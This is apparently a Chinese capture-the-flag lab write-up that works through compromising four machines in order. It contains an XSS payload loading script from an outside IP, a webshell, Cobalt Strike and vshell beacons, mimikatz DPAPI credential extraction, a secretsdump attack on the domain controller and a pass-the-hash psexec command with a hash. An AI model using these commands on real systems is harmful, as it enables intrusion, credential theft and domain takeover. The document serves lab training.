第一台
评论提交的地方发现有xss漏洞
尝试闭合并且构造xss的攻击代码
后台处理评论的时候,发现弹窗存在
之后构造恶意的js,对web的页面进行修改
至此 payload为
https://www.baidu.com/"/><script/src=//32.105.24.180/exp.js></script><div/"
去后台触发一下
之后再去看看eda.php
蚁剑连接成功
蚁剑连接成功
找到了第一个flag
第二台
fscan扫描扫出来个内⽹ip和端⼝,192.168.184.171:3306
在控制台外观找到可以写入木马的文件保存
发现了第二台机器的3306开启且发现密码
然后搭建隧道
连接成功
之后直接
用cs的txt
cs上线成功
桌面发现找到第二个flag
上线一下vshell
第三台
上线后直接port scan发现第三台主机,10.10.20.129的3306端⼝,就去收集⼀下凭据
拿guid去找masterkey:mimikatz sekurlsa::dpapi
然后去爆破⼀下密码 去远程⼀下3389去上传码⼦码⼦⽤中继监听去⽣成
远程连接到第三台
将exe文件导入使用上线成功
第四台
hostname去看下他的主机id: hostname:19client
ipconfig /all发现他的域名为:DNS:0x7e.labs所以证明他是⼀个域内机器
whoami /all发现他是⼀个⼯作组⽤户:
19client\administrator 通过信息收集发现是⼯作组打域,就直接尝试了下滞空哈希(上⾯fscan发现域控的机器名为:19DC)
shell secretsdump.exe -no-pass 0x7e.labs/19DC$@10.10.30.128去拿hash
psexec -hashes :0b7f5948117f3728fb173d8fb2b85b4b 0x7e.labs/administrator@1 0.10.30.128
挂双层代理
用小红帽加入命令行exe
得到第四个flag